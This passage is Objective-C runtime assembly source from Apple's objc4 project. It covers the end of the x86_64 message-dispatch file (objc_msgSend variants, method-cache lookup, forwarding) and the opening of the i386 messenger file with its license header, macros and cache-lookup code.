xorl %eax, %eax // don't return msgSend_uncached
4: ret
.elseif $0 == NORMAL || $0 == FPRET || $0 == FP2RET
// eq already set for forwarding by `jne`
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER
movq receiver(%a1), %a1 // load real receiver
cmp %r10, %r10 // set eq for non-stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER2
movq receiver(%a1), %a1 // load real receiver
cmp %r10, %r10 // set eq for non-stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == STRET
test %r10, %r10 // set ne for stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER_STRET
movq receiver(%a2), %a2 // load real receiver
test %r10, %r10 // set ne for stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER2_STRET
movq receiver(%a2), %a2 // load real receiver
test %r10, %r10 // set ne for stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.else
.abort oops
.endif
.endmacro
.macro CacheLookup
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
movq %a2, %r10 // r10 = _cmd
.else
movq %a3, %r10 // r10 = _cmd
.endif
andl 24(%r11), %r10d // r10 = _cmd & class->cache.mask
shlq $$4, %r10 // r10 = offset = (_cmd & mask)<<4
addq 16(%r11), %r10 // r10 = class->cache.buckets + offset
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
cmpq (%r10), %a2 // if (bucket->sel != _cmd)
.else
cmpq (%r10), %a3 // if (bucket->sel != _cmd)
.endif
jne 1f // scan more
// CacheHit must always be preceded by a not-taken `jne` instruction
CacheHit $0 // call or return imp
1:
// loop
cmpq $$1, (%r10)
jbe 3f // if (bucket->sel <= 1) wrap or miss
addq $$16, %r10 // bucket++
2:
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
cmpq (%r10), %a2 // if (bucket->sel != _cmd)
.else
cmpq (%r10), %a3 // if (bucket->sel != _cmd)
.endif
jne 1b // scan more
// CacheHit must always be preceded by a not-taken `jne` instruction
CacheHit $0 // call or return imp
3:
// wrap or miss
jb LCacheMiss_f // if (bucket->sel < 1) cache miss
// wrap
movq 8(%r10), %r10 // bucket->imp is really first bucket
jmp 2f
// Clone scanning loop to miss instead of hang when cache is corrupt.
// The slow path may detect any corruption and halt later.
1:
// loop
cmpq $$1, (%r10)
jbe 3f // if (bucket->sel <= 1) wrap or miss
addq $$16, %r10 // bucket++
2:
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
cmpq (%r10), %a2 // if (bucket->sel != _cmd)
.else
cmpq (%r10), %a3 // if (bucket->sel != _cmd)
.endif
jne 1b // scan more
// CacheHit must always be preceded by a not-taken `jne` instruction
CacheHit $0 // call or return imp
3:
// double wrap or miss
jmp LCacheMiss_f
.endmacro
/////////////////////////////////////////////////////////////////////
//
// MethodTableLookup classRegister, selectorRegister
//
// Takes: $0 = class to search (a1 or a2 or r10 ONLY)
// $1 = selector to search for (a2 or a3 ONLY)
// r11 = class to search
//
// On exit: imp in %r11
//
/////////////////////////////////////////////////////////////////////
.macro MethodTableLookup
MESSENGER_END_SLOW
SaveRegisters
// _class_lookupMethodAndLoadCache3(receiver, selector, class)
movq $0, %a1
movq $1, %a2
movq %r11, %a3
call __class_lookupMethodAndLoadCache3
// IMP is now in %rax
movq %rax, %r11
RestoreRegisters
.endmacro
/////////////////////////////////////////////////////////////////////
//
// GetIsaCheckNil return-type
// GetIsaSupport return-type
//
// Sets r11 = receiver->isa.
// Looks up the real class if receiver is a tagged pointer object.
// Returns zero if obj is nil.
//
// Takes: $0 = NORMAL or FPRET or FP2RET or STRET
// a1 or a2 (STRET) = receiver
//
// On exit: r11 = receiver->isa
// r10 is clobbered
//
/////////////////////////////////////////////////////////////////////
.macro GetIsaCheckNil
.if $0 == SUPER || $0 == SUPER_STRET
error super dispatch does not test for nil
.endif
.if $0 != STRET
testq %a1, %a1
.else
testq %a2, %a2
.endif
jle LNilOrTagged_f // MSB tagged pointer looks negative
.if $0 != STRET
movq (%a1), %r11 // r11 = isa
.else
movq (%a2), %r11 // r11 = isa
.endif
LGetIsaDone:
.endmacro
.macro GetIsaSupport
.align 3
LNilOrTagged:
jz LNil_f // flags set by NilOrTaggedTest
// tagged
leaq _objc_debug_taggedpointer_classes(%rip), %r11
.if $0 != STRET
movq %a1, %r10
.else
movq %a2, %r10
.endif
shrq $$60, %r10
movq (%r11, %r10, 8), %r11 // read isa from table
jmp LGetIsaDone_b
LNil:
// nil
.if $0 == FPRET
fldz
.elseif $0 == FP2RET
fldz
fldz
.endif
.if $0 == STRET
movq %rdi, %rax
.else
xorl %eax, %eax
xorl %edx, %edx
xorps %xmm0, %xmm0
xorps %xmm1, %xmm1
.endif
MESSENGER_END_NIL
ret
.endmacro
/********************************************************************
* IMP cache_getImp(Class cls, SEL sel)
*
* On entry: a1 = class whose cache is to be searched
* a2 = selector to search for
*
* If found, returns method implementation.
* If not found, returns NULL.
********************************************************************/
// IMP cache_getImp(Class cls, SEL sel)
// Cache-only lookup; never falls through to the method lists.
STATIC_ENTRY _cache_getImp
// do lookup
movq %a1, %r11 // move class to r11 for CacheLookup
CacheLookup GETIMP // returns IMP on success
LCacheMiss:
// cache miss, return nil
xorl %eax, %eax
ret
LGetImpExit:
END_ENTRY _cache_getImp
/********************************************************************
*
* id objc_msgSend(id self, SEL _cmd,...);
*
********************************************************************/
// Table of 16 class pointers indexed by tagged-pointer tag
// (top 4 bits of the pointer; see GetIsaSupport). Zero-filled here;
// populated at runtime.
.data
.align 3
.globl _objc_debug_taggedpointer_classes
_objc_debug_taggedpointer_classes:
.fill 16, 8, 0
ENTRY _objc_msgSend
MESSENGER_START
GetIsaCheckNil NORMAL // r11 = self->isa, or return zero
CacheLookup NORMAL // calls IMP on success
GetIsaSupport NORMAL // out-of-line nil/tagged handling for GetIsaCheckNil
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend
// Obsolete dispatch fixup entry point: deliberately traps if reached.
ENTRY _objc_msgSend_fixup
int3
END_ENTRY _objc_msgSend_fixup
// Fixed-up form: message_ref is in %a2; extract the selector and
// fall into the ordinary messenger.
STATIC_ENTRY _objc_msgSend_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSend
END_ENTRY _objc_msgSend_fixedup
/********************************************************************
*
* id objc_msgSendSuper(struct objc_super *super, SEL _cmd,...);
*
* struct objc_super {
* id receiver;
* Class class;
* };
********************************************************************/
ENTRY _objc_msgSendSuper
MESSENGER_START
// search the cache (objc_super in %a1)
movq class(%a1), %r11 // class = objc_super->class
CacheLookup SUPER // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// class still in r11
movq receiver(%a1), %r10
MethodTableLookup %r10, %a2 // r11 = IMP
movq receiver(%a1), %a1 // load real receiver
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper
/********************************************************************
* id objc_msgSendSuper2
********************************************************************/
ENTRY _objc_msgSendSuper2
MESSENGER_START
// objc_super->class is superclass of class to search
// search the cache (objc_super in %a1)
movq class(%a1), %r11 // cls = objc_super->class
movq 8(%r11), %r11 // cls = class->superclass
CacheLookup SUPER2 // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// superclass still in r11
movq receiver(%a1), %r10
MethodTableLookup %r10, %a2 // r11 = IMP
movq receiver(%a1), %a1 // load real receiver
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper2
// Obsolete dispatch fixup entry point: deliberately traps if reached.
ENTRY _objc_msgSendSuper2_fixup
int3
END_ENTRY _objc_msgSendSuper2_fixup
STATIC_ENTRY _objc_msgSendSuper2_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSendSuper2
END_ENTRY _objc_msgSendSuper2_fixedup
/********************************************************************
*
* double objc_msgSend_fpret(id self, SEL _cmd,...);
* Used for `long double` return only. `float` and `double` use objc_msgSend.
*
********************************************************************/
ENTRY _objc_msgSend_fpret
MESSENGER_START
GetIsaCheckNil FPRET // r11 = self->isa, or return zero
CacheLookup FPRET // calls IMP on success
GetIsaSupport FPRET // out-of-line nil/tagged handling (fldz on nil)
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend_fpret
// Obsolete dispatch fixup entry point: deliberately traps if reached.
ENTRY _objc_msgSend_fpret_fixup
int3
END_ENTRY _objc_msgSend_fpret_fixup
STATIC_ENTRY _objc_msgSend_fpret_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSend_fpret
END_ENTRY _objc_msgSend_fpret_fixedup
/********************************************************************
*
* double objc_msgSend_fp2ret(id self, SEL _cmd,...);
* Used for `complex long double` return only.
*
********************************************************************/
ENTRY _objc_msgSend_fp2ret
MESSENGER_START
GetIsaCheckNil FP2RET // r11 = self->isa, or return zero
CacheLookup FP2RET // calls IMP on success
GetIsaSupport FP2RET // out-of-line nil/tagged handling (fldz pair on nil)
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend_fp2ret
// Obsolete dispatch fixup entry point: deliberately traps if reached.
ENTRY _objc_msgSend_fp2ret_fixup
int3
END_ENTRY _objc_msgSend_fp2ret_fixup
STATIC_ENTRY _objc_msgSend_fp2ret_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSend_fp2ret
END_ENTRY _objc_msgSend_fp2ret_fixedup
/********************************************************************
*
* void objc_msgSend_stret(void *st_addr, id self, SEL _cmd, ...);
*
* objc_msgSend_stret is the struct-return form of msgSend.
* The ABI calls for %a1 to be used as the address of the structure
* being returned, with the parameters in the succeeding locations.
*
* On entry: %a1 is the address where the structure is returned,
* %a2 is the message receiver,
* %a3 is the selector
********************************************************************/
// Struct-return messenger: %a1 = struct-return address, %a2 = receiver,
// %a3 = selector.
ENTRY _objc_msgSend_stret
MESSENGER_START
GetIsaCheckNil STRET // r11 = self->isa, or return zero
CacheLookup STRET // calls IMP on success
GetIsaSupport STRET // out-of-line nil/tagged handling for GetIsaCheckNil
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a2, %a3 // r11 = IMP
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend_stret
// Obsolete dispatch fixup entry point: deliberately traps if reached.
ENTRY _objc_msgSend_stret_fixup
int3
END_ENTRY _objc_msgSend_stret_fixup
STATIC_ENTRY _objc_msgSend_stret_fixedup
// Load _cmd from the message_ref
movq 8(%a3), %a3
jmp _objc_msgSend_stret
END_ENTRY _objc_msgSend_stret_fixedup
/********************************************************************
*
* void objc_msgSendSuper_stret(void *st_addr, struct objc_super *super, SEL _cmd, ...);
*
* struct objc_super {
* id receiver;
* Class class;
* };
*
* objc_msgSendSuper_stret is the struct-return form of msgSendSuper.
* The ABI calls for (sp+4) to be used as the address of the structure
* being returned, with the parameters in the succeeding registers.
*
* On entry: %a1 is the address where the structure is returned,
* %a2 is the address of the objc_super structure,
* %a3 is the selector
*
********************************************************************/
ENTRY _objc_msgSendSuper_stret
MESSENGER_START
// search the cache (objc_super in %a2)
movq class(%a2), %r11 // class = objc_super->class
CacheLookup SUPER_STRET // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// class still in r11
movq receiver(%a2), %r10
MethodTableLookup %r10, %a3 // r11 = IMP
movq receiver(%a2), %a2 // load real receiver
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper_stret
/********************************************************************
* id objc_msgSendSuper2_stret
********************************************************************/
ENTRY _objc_msgSendSuper2_stret
MESSENGER_START
// search the cache (objc_super in %a2)
// objc_super->class is the superclass of the class to search
movq class(%a2), %r11 // class = objc_super->class
movq 8(%r11), %r11 // class = class->superclass
CacheLookup SUPER2_STRET // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// superclass still in r11
movq receiver(%a2), %r10
MethodTableLookup %r10, %a3 // r11 = IMP
movq receiver(%a2), %a2 // load real receiver
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper2_stret
// Obsolete dispatch fixup entry point: deliberately traps if reached.
ENTRY _objc_msgSendSuper2_stret_fixup
int3
END_ENTRY _objc_msgSendSuper2_stret_fixup
STATIC_ENTRY _objc_msgSendSuper2_stret_fixedup
// Load _cmd from the message_ref
movq 8(%a3), %a3
jmp _objc_msgSendSuper2_stret
END_ENTRY _objc_msgSendSuper2_stret_fixedup
/********************************************************************
*
* _objc_msgSend_uncached_impcache
* _objc_msgSend_uncached
* _objc_msgSend_stret_uncached
*
* Used to erase method cache entries in-place by
* bouncing them to the uncached lookup.
*
********************************************************************/
STATIC_ENTRY __objc_msgSend_uncached_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band condition register is NE for stret, EQ otherwise.
// Out-of-band r11 is the searched class
MESSENGER_START
nop
MESSENGER_END_SLOW
// Dispatch on the out-of-band EQ/NE flag left by the messenger.
jne __objc_msgSend_stret_uncached
jmp __objc_msgSend_uncached
END_ENTRY __objc_msgSend_uncached_impcache
STATIC_ENTRY __objc_msgSend_uncached
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band r11 is the searched class
// r11 is already the class to search
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY __objc_msgSend_uncached
STATIC_ENTRY __objc_msgSend_stret_uncached
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band r11 is the searched class
// r11 is already the class to search
// stret argument order: %a2 = receiver, %a3 = selector
MethodTableLookup %a2, %a3 // r11 = IMP
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY __objc_msgSend_stret_uncached
/********************************************************************
*
* id _objc_msgForward(id self, SEL _cmd,...);
*
* _objc_msgForward and _objc_msgForward_stret are the externally-callable
* functions returned by things like method_getImplementation().
* _objc_msgForward_impcache is the function pointer actually stored in
* method caches.
*
********************************************************************/
STATIC_ENTRY __objc_msgForward_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band condition register is NE for stret, EQ otherwise.
MESSENGER_START
nop
MESSENGER_END_SLOW
// Dispatch on the out-of-band EQ/NE flag left by the messenger.
jne __objc_msgForward_stret
jmp __objc_msgForward
END_ENTRY __objc_msgForward_impcache
ENTRY __objc_msgForward
// Non-stret version: tail-call the installed forward handler.
movq __objc_forward_handler(%rip), %r11
jmp *%r11
END_ENTRY __objc_msgForward
ENTRY __objc_msgForward_stret
// Struct-return version: tail-call the installed stret forward handler.
movq __objc_forward_stret_handler(%rip), %r11
jmp *%r11
END_ENTRY __objc_msgForward_stret
// Debug/alternate entry points: each is a plain tail-call alias for
// the corresponding messenger.
ENTRY _objc_msgSend_debug
jmp _objc_msgSend
END_ENTRY _objc_msgSend_debug
ENTRY _objc_msgSendSuper2_debug
jmp _objc_msgSendSuper2
END_ENTRY _objc_msgSendSuper2_debug
ENTRY _objc_msgSend_stret_debug
jmp _objc_msgSend_stret
END_ENTRY _objc_msgSend_stret_debug
ENTRY _objc_msgSendSuper2_stret_debug
jmp _objc_msgSendSuper2_stret
END_ENTRY _objc_msgSendSuper2_stret_debug
ENTRY _objc_msgSend_fpret_debug
jmp _objc_msgSend_fpret
END_ENTRY _objc_msgSend_fpret_debug
ENTRY _objc_msgSend_fp2ret_debug
jmp _objc_msgSend_fp2ret
END_ENTRY _objc_msgSend_fp2ret_debug
ENTRY _objc_msgSend_noarg
jmp _objc_msgSend
END_ENTRY _objc_msgSend_noarg
// method_invoke(Method m, id receiver, ...): replace the Method
// argument's slot with the method's selector, then tail-call its IMP.
ENTRY _method_invoke
movq method_imp(%a2), %r11
movq method_name(%a2), %a2
jmp *%r11
END_ENTRY _method_invoke
// Struct-return variant: the Method argument is in %a3.
ENTRY _method_invoke_stret
movq method_imp(%a3), %r11
movq method_name(%a3), %a3
jmp *%r11
END_ENTRY _method_invoke_stret
// IMP for ignored selectors: returns self unchanged.
STATIC_ENTRY __objc_ignored_method
movq %a1, %rax
ret
END_ENTRY __objc_ignored_method
// Zero terminator for the __objc_msg_break breakpoint list.
.section __DATA,__objc_msg_break
.quad 0
.quad 0
#endif
|
opensource-apple/objc4 | 32,883 | runtime/Messengers.subproj/objc-msg-i386.s | /*
* Copyright (c) 1999-2007 Apple Inc. All Rights Reserved.
*
* @APPLE_LICENSE_HEADER_START@
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this
* file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_LICENSE_HEADER_END@
*/
#include <TargetConditionals.h>
#if defined(__i386__) && !TARGET_IPHONE_SIMULATOR
/********************************************************************
********************************************************************
**
** objc-msg-i386.s - i386 code to support objc messaging.
**
********************************************************************
********************************************************************/
// for kIgnore
#include "objc-config.h"
/********************************************************************
* Data used by the ObjC runtime.
*
********************************************************************/
.data
// _objc_entryPoints and _objc_exitPoints are used by objc
// to get the critical regions for which method caches
// cannot be garbage collected. Each entry point is paired
// positionally with its exit label below; both lists are
// zero-terminated.
.align 2
.private_extern _objc_entryPoints
_objc_entryPoints:
.long __cache_getImp
.long __cache_getMethod
.long _objc_msgSend
.long _objc_msgSend_fpret
.long _objc_msgSend_stret
.long _objc_msgSendSuper
.long _objc_msgSendSuper_stret
.long 0
.private_extern _objc_exitPoints
_objc_exitPoints:
.long LGetImpExit
.long LGetMethodExit
.long LMsgSendExit
.long LMsgSendFpretExit
.long LMsgSendStretExit
.long LMsgSendSuperExit
.long LMsgSendSuperStretExit
.long 0
/********************************************************************
* List every exit insn from every messenger for debugger use.
* Format:
* (
* 1 word instruction's address
* 1 word type (ENTER or FAST_EXIT or SLOW_EXIT or NIL_EXIT)
* )
* 1 word zero
*
* ENTER is the start of a dispatcher
* FAST_EXIT is method dispatch
* SLOW_EXIT is uncached method lookup
* NIL_EXIT is returning zero from a message sent to nil
* These must match objc-gdb.h.
********************************************************************/
// Breakpoint-type codes recorded in __objc_msg_break;
// must match objc-gdb.h.
#define ENTER 1
#define FAST_EXIT 2
#define SLOW_EXIT 3
#define NIL_EXIT 4
.section __DATA,__objc_msg_break
.globl _gdb_objc_messenger_breakpoints
_gdb_objc_messenger_breakpoints:
// contents populated by the macros below
// Each MESSENGER_* macro drops a local label `4:` at the current
// code address and records (address, type) in __objc_msg_break,
// then returns to the text section.
.macro MESSENGER_START
4:
.section __DATA,__objc_msg_break
.long 4b
.long ENTER
.text
.endmacro
.macro MESSENGER_END_FAST
4:
.section __DATA,__objc_msg_break
.long 4b
.long FAST_EXIT
.text
.endmacro
.macro MESSENGER_END_SLOW
4:
.section __DATA,__objc_msg_break
.long 4b
.long SLOW_EXIT
.text
.endmacro
.macro MESSENGER_END_NIL
4:
.section __DATA,__objc_msg_break
.long 4b
.long NIL_EXIT
.text
.endmacro
/********************************************************************
*
* Common offsets.
*
********************************************************************/
// Stack offsets of the messenger arguments (relative to %esp at
// function entry, i.e. past the return address).
self = 4
super = 4
selector = 8
marg_size = 12
marg_list = 16
first_arg = 12
// Struct-return forms: slot 4 holds the struct-return address,
// shifting every other argument by 4 bytes.
struct_addr = 4
self_stret = 8
super_stret = 8
selector_stret = 12
marg_size_stret = 16
marg_list_stret = 20
// objc_super parameter to sendSuper
receiver = 0
class = 4
// Selected field offsets in class structure
isa = 0
cache = 32
// Method descriptor
method_name = 0
method_imp = 8
// Cache header
mask = 0
occupied = 4
buckets = 8 // variable length array
#if defined(OBJC_INSTRUMENTED)
// Cache instrumentation data, follows buckets
hitCount = 0
hitProbes = hitCount + 4
maxHitProbes = hitProbes + 4
missCount = maxHitProbes + 4
missProbes = missCount + 4
maxMissProbes = missProbes + 4
flushCount = maxMissProbes + 4
flushedEntries = flushCount + 4
// Buckets in CacheHitHistogram and CacheMissHistogram
CACHE_HISTOGRAM_SIZE = 512
#endif
//////////////////////////////////////////////////////////////////////
//
// ENTRY functionName
//
// Assembly directives to begin an exported function.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
// ENTRY: begin an exported function ($0 = name), 16-byte aligned
// with 0x90 (nop) padding.
.macro ENTRY
.text
.globl $0
.align 4, 0x90
$0:
.endmacro
// STATIC_ENTRY: same, but the symbol is private_extern.
.macro STATIC_ENTRY
.text
.private_extern $0
.align 4, 0x90
$0:
.endmacro
//////////////////////////////////////////////////////////////////////
//
// END_ENTRY functionName
//
// Assembly directives to end an exported function. Just a placeholder,
// a close-parenthesis for ENTRY, until it is needed for something.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro END_ENTRY
.endmacro
//////////////////////////////////////////////////////////////////////
//
// CALL_MCOUNTER
//
// Calls mcount() profiling routine. Must be called immediately on
// function entry, before any prologue executes.
//
//////////////////////////////////////////////////////////////////////
// Calls the mcount() profiling routine when built with PROFILE;
// otherwise expands to nothing. Must run before any prologue.
.macro CALL_MCOUNTER
#ifdef PROFILE
// Current stack contents: ret
pushl %ebp
movl %esp,%ebp
subl $$8,%esp // keep stack 16-byte aligned for the call
// Current stack contents: ret, ebp, pad, pad
call mcount
movl %ebp,%esp
popl %ebp
#endif
.endmacro
/////////////////////////////////////////////////////////////////////
//
//
// CacheLookup WORD_RETURN | STRUCT_RETURN, MSG_SEND | MSG_SENDSUPER | CACHE_GET, cacheMissLabel
//
// Locate the implementation for a selector in a class method cache.
//
// Takes: WORD_RETURN (first parameter is at sp+4)
// STRUCT_RETURN (struct address is at sp+4, first parameter at sp+8)
// MSG_SEND (first parameter is receiver)
// MSG_SENDSUPER (first parameter is address of objc_super structure)
// CACHE_GET (first parameter is class; return method triplet)
// selector in %ecx
// class to search in %edx
//
// cacheMissLabel = label to branch to iff method is not cached
//
// On exit: (found) MSG_SEND and MSG_SENDSUPER: return imp in eax
// (found) CACHE_GET: return method triplet in eax
// (not found) jumps to cacheMissLabel
//
/////////////////////////////////////////////////////////////////////
// Values to specify to method lookup macros whether the return type of
// the method is word or structure.
// Values to specify to method lookup macros whether the return type of
// the method is word or structure.
WORD_RETURN = 0
STRUCT_RETURN = 1
// Values to specify to method lookup macros whether the first argument
// is an object/class reference or a 'objc_super' structure.
MSG_SEND = 0 // first argument is receiver, search the isa
MSG_SENDSUPER = 1 // first argument is objc_super, search the class
CACHE_GET = 2 // first argument is class, search that class
// CacheLookup $0=WORD_RETURN|STRUCT_RETURN, $1=MSG_SEND|MSG_SENDSUPER|CACHE_GET,
//             $2=cache-miss label
// In:  ecx = selector, edx = class to search
// Out (hit):  eax = IMP (or method triplet for CACHE_GET); esi/edi restored
// Out (miss): jumps to $2 with edx = receiver, ecx = selector, eax = class
.macro CacheLookup
// load variables and save caller registers.
pushl %edi // save scratch register
movl cache(%edx), %edi // cache = class->cache
pushl %esi // save scratch register
#if defined(OBJC_INSTRUMENTED)
pushl %ebx // save non-volatile register
pushl %eax // save cache pointer
xorl %ebx, %ebx // probeCount = 0
#endif
movl mask(%edi), %esi // mask = cache->mask
movl %ecx, %edx // index = selector
shrl $$2, %edx // index = selector >> 2
// search the receiver's cache
// ecx = selector
// edi = cache
// esi = mask
// edx = index
// eax = method (soon)
LMsgSendProbeCache_$0_$1_$2:
#if defined(OBJC_INSTRUMENTED)
addl $$1, %ebx // probeCount += 1
#endif
andl %esi, %edx // index &= mask
movl buckets(%edi, %edx, 4), %eax // meth = cache->buckets[index]
testl %eax, %eax // check for end of bucket
je LMsgSendCacheMiss_$0_$1_$2 // go to cache miss code
cmpl method_name(%eax), %ecx // check for method name match
je LMsgSendCacheHit_$0_$1_$2 // go handle cache hit
addl $$1, %edx // bump index ...
jmp LMsgSendProbeCache_$0_$1_$2 // ... and loop
// not found in cache: restore state and go to callers handler
LMsgSendCacheMiss_$0_$1_$2:
#if defined(OBJC_INSTRUMENTED)
popl %edx // retrieve cache pointer
movl mask(%edx), %esi // mask = cache->mask
testl %esi, %esi // a mask of zero is only for the...
je LMsgSendMissInstrumentDone_$0_$1_$2 // ... emptyCache, do not record anything
// locate and update the CacheInstrumentation structure
addl $$1, %esi // entryCount = mask + 1
shll $$2, %esi // tableSize = entryCount * sizeof(entry)
addl $buckets, %esi // offset = buckets + tableSize
addl %edx, %esi // cacheData = &cache->buckets[mask+1]
movl missCount(%esi), %edi //
addl $$1, %edi //
movl %edi, missCount(%esi) // cacheData->missCount += 1
movl missProbes(%esi), %edi //
addl %ebx, %edi //
movl %edi, missProbes(%esi) // cacheData->missProbes += probeCount
movl maxMissProbes(%esi), %edi// if (cacheData->maxMissProbes < probeCount)
cmpl %ebx, %edi //
jge LMsgSendMaxMissProbeOK_$0_$1_$2 //
movl %ebx, maxMissProbes(%esi)// cacheData->maxMissProbes = probeCount
LMsgSendMaxMissProbeOK_$0_$1_$2:
// update cache miss probe histogram
cmpl $CACHE_HISTOGRAM_SIZE, %ebx // pin probeCount to max index
jl LMsgSendMissHistoIndexSet_$0_$1_$2
movl $(CACHE_HISTOGRAM_SIZE-1), %ebx
LMsgSendMissHistoIndexSet_$0_$1_$2:
LEA_STATIC_DATA %esi, _CacheMissHistogram, EXTERNAL_SYMBOL
shll $$2, %ebx // convert probeCount to histogram index
addl %ebx, %esi // calculate &CacheMissHistogram[probeCount<<2]
movl 0(%esi), %edi // get current tally
addl $$1, %edi //
movl %edi, 0(%esi) // tally += 1
LMsgSendMissInstrumentDone_$0_$1_$2:
popl %ebx // restore non-volatile register
#endif
// NOTE: the "+8" in the super offsets below accounts for the two
// registers (edi, esi) still pushed on the stack at this point.
.if $0 == WORD_RETURN // Regular word return
.if $1 == MSG_SEND // MSG_SEND
popl %esi // restore callers register
popl %edi // restore callers register
movl self(%esp), %edx // get messaged object
movl isa(%edx), %eax // get objects class
.elseif $1 == MSG_SENDSUPER // MSG_SENDSUPER
// replace "super" arg with "receiver"
movl super+8(%esp), %edi // get super structure
movl receiver(%edi), %edx // get messaged object
movl %edx, super+8(%esp) // make it the first argument
movl class(%edi), %eax // get messaged class
popl %esi // restore callers register
popl %edi // restore callers register
.else // CACHE_GET
popl %esi // restore callers register
popl %edi // restore callers register
.endif
.else // Struct return
.if $1 == MSG_SEND // MSG_SEND (stret)
popl %esi // restore callers register
popl %edi // restore callers register
movl self_stret(%esp), %edx // get messaged object
movl isa(%edx), %eax // get objects class
.elseif $1 == MSG_SENDSUPER // MSG_SENDSUPER (stret)
// replace "super" arg with "receiver"
movl super_stret+8(%esp), %edi// get super structure
movl receiver(%edi), %edx // get messaged object
movl %edx, super_stret+8(%esp)// make it the first argument
movl class(%edi), %eax // get messaged class
popl %esi // restore callers register
popl %edi // restore callers register
.else // CACHE_GET
// deliberately invalid text: forces an assembler error if this
// unsupported combination (STRUCT_RETURN + CACHE_GET) is expanded
!! This should not happen.
.endif
.endif
// edx = receiver
// ecx = selector
// eax = class
jmp $2 // go to callers handler
// eax points to matching cache entry
.align 4, 0x90
LMsgSendCacheHit_$0_$1_$2:
#if defined(OBJC_INSTRUMENTED)
popl %edx // retrieve cache pointer
movl mask(%edx), %esi // mask = cache->mask
testl %esi, %esi // a mask of zero is only for the...
je LMsgSendHitInstrumentDone_$0_$1_$2 // ... emptyCache, do not record anything
// locate and update the CacheInstrumentation structure
addl $$1, %esi // entryCount = mask + 1
shll $$2, %esi // tableSize = entryCount * sizeof(entry)
addl $buckets, %esi // offset = buckets + tableSize
addl %edx, %esi // cacheData = &cache->buckets[mask+1]
movl hitCount(%esi), %edi
addl $$1, %edi
movl %edi, hitCount(%esi) // cacheData->hitCount += 1
movl hitProbes(%esi), %edi
addl %ebx, %edi
movl %edi, hitProbes(%esi) // cacheData->hitProbes += probeCount
movl maxHitProbes(%esi), %edi// if (cacheData->maxHitProbes < probeCount)
cmpl %ebx, %edi
jge LMsgSendMaxHitProbeOK_$0_$1_$2
movl %ebx, maxHitProbes(%esi)// cacheData->maxHitProbes = probeCount
LMsgSendMaxHitProbeOK_$0_$1_$2:
// update cache hit probe histogram
cmpl $CACHE_HISTOGRAM_SIZE, %ebx // pin probeCount to max index
jl LMsgSendHitHistoIndexSet_$0_$1_$2
movl $(CACHE_HISTOGRAM_SIZE-1), %ebx
LMsgSendHitHistoIndexSet_$0_$1_$2:
LEA_STATIC_DATA %esi, _CacheHitHistogram, EXTERNAL_SYMBOL
shll $$2, %ebx // convert probeCount to histogram index
addl %ebx, %esi // calculate &CacheHitHistogram[probeCount<<2]
